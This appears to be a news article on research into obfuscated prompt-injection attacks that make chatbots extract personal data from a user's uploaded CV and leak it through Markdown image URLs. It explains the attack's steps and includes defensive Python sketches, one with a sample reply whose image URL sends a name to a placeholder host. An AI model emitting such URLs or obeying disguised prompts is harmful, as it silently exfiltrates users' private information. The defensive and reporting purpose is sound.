This Prompt Enables an AI Chatbot to Recognize and Extract Personal Information from Your Conversations

Recent research has revealed a concerning vulnerability in large language models (LLMs): attackers can use misleading or obfuscated prompts to make a chatbot extract personal information from a conversation. The researchers said that in a real-world attack, people could be deceived into believing that an unintelligible prompt does something useful, such as improving their resume. They pointed to the many online platforms that offer ready-made prompts for users. To demonstrate the risk, they started conversations with chatbots and uploaded a curriculum vitae (CV). In these tests, the prompt successfully retrieved the personal data contained in the uploaded document.

Earlence Fernandes, an assistant professor at the University of California, San Diego, who contributed to the study, remarked on the intricate nature of the attack. The obfuscated prompts must perform multiple functions: identifying specific personal information, generating a workable URL, utilizing proper Markdown syntax, and concealing any malicious intent from the user. He compared the exploit to malware, noting its capability to execute actions that the user might not have anticipated.
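To make the URL and Markdown steps concrete, here is a minimal sketch for auditing a chatbot reply. It lists every inline Markdown image a renderer would fetch, together with the host and query parameters that would be sent along. The function name `outbound_image_requests`, the host `collector.example`, and the sample reply are hypothetical and do not come from the study; the sketch only covers the inline `![alt](url)` form.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches inline Markdown images of the form ![alt](url)
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def outbound_image_requests(markdown_text):
    """Return (host, path, query parameters) for each inline image a renderer would fetch."""
    found = []
    for match in IMAGE_PATTERN.finditer(markdown_text):
        try:
            parts = urlsplit(match.group(1))
        except ValueError:
            # Malformed URL: nothing a renderer could fetch, so skip it.
            continue
        if parts.scheme in ("http", "https"):
            found.append((parts.netloc, parts.path, parse_qs(parts.query)))
    return found


# Hypothetical reply: the query string carries text taken from the conversation.
reply = "Here is your improved CV. ![status](https://collector.example/pixel.png?q=Jane+Doe)"
for host, path, params in outbound_image_requests(reply):
    print(host, path, params)
```

The point of the sketch is that rendering the image is itself the network request: whatever text ends up in the URL is delivered to the remote host without the user clicking anything.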

Fernandes further noted how compact the exploit is. Traditional malware, he said, would typically need a large amount of code to achieve similar results. Here, the complex behavior is encapsulated in a single, seemingly innocuous prompt.

In response to the research, a representative from Mistral AI welcomed the researchers' engagement and said the company took immediate action to fix the identified vulnerability. The company classified the issue as medium severity and changed its Markdown renderer so that it can no longer call external URLs, which blocks the loading of external images.
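A mitigation of this kind can be sketched as a filter applied to model output before it is rendered. The code below is an illustrative assumption, not Mistral AI's actual fix: the function `strip_external_images` and the allowlisted host `static.chat.example` are hypothetical, and only inline `![alt](url)` images are handled, so reference-style images and raw HTML would need separate treatment.

```python
import re
from urllib.parse import urlsplit

# Matches inline Markdown images and captures the alt text and the URL.
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")

# Hypothetical allowlist of hosts the chat client itself controls.
TRUSTED_IMAGE_HOSTS = frozenset({"static.chat.example"})


def strip_external_images(markdown_text, trusted_hosts=TRUSTED_IMAGE_HOSTS):
    """Replace every inline image whose host is not allowlisted with a text placeholder."""

    def replace(match):
        alt_text, url = match.group(1), match.group(2)
        try:
            parts = urlsplit(url)
        except ValueError:
            parts = None  # Malformed URL: treat as untrusted.
        if parts and parts.scheme == "https" and parts.hostname in trusted_hosts:
            return match.group(0)  # Keep images served from trusted hosts.
        return f"[image removed: {alt_text}]"

    return IMAGE_PATTERN.sub(replace, markdown_text)


print(strip_external_images("Done. ![ok](https://collector.example/p.png?q=Jane+Doe)"))
print(strip_external_images("Logo: ![logo](https://static.chat.example/logo.png)"))
```

Because the image is never rendered, the client never issues the request, so the URL and anything embedded in it stay on the user's machine. The trade-off is the one Fernandes raises: legitimate external images are blocked as well.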

Fernandes suggested that Mistral AI’s update exemplifies one of the first instances where an adversarial prompt has led to a modification of an LLM product, as opposed to merely filtering out troublesome prompts. However, he cautioned that restricting the capabilities of LLM agents could be counterproductive in the long run, potentially stifling innovative applications.

In a separate statement, the developers of ChatGLM emphasized that they have robust security measures in place to protect user privacy. They affirmed their commitment to model security and privacy protection and said that open-sourcing their model allows the community to scrutinize and evaluate its capabilities and security features.

Dan McInerney, lead threat researcher at Protect AI, commented on the implications of the study, noting that the algorithm introduced in the research is capable of generating prompts for prompt injection attacks that could result in various exploitations, including the exfiltration of personally identifiable information (PII) and misuse of tools available to LLM agents. He stated that while the methods identified are not entirely new, the research contributes to a more automated approach to LLM attacks rather than unveiling undiscovered vulnerabilities.

Furthermore, McInerney underscored the increasing risks associated with widely deployed LLM agents. As organizations delegate greater authority to these agents for performing tasks, the potential for exploitation rises significantly. He stressed that deploying LLMs that accept arbitrary user input should be regarded as a high-risk endeavor necessitating extensive security evaluations prior to their implementation.

For businesses operating in this evolving landscape, it is crucial to understand how AI agents can interact with data and how those interactions could be abused. Individuals, for their part, must remain vigilant about the information they share with AI applications and about the origins of any prompts they intend to use. As these models continue to develop, their security implications call for careful consideration and proactive measures.
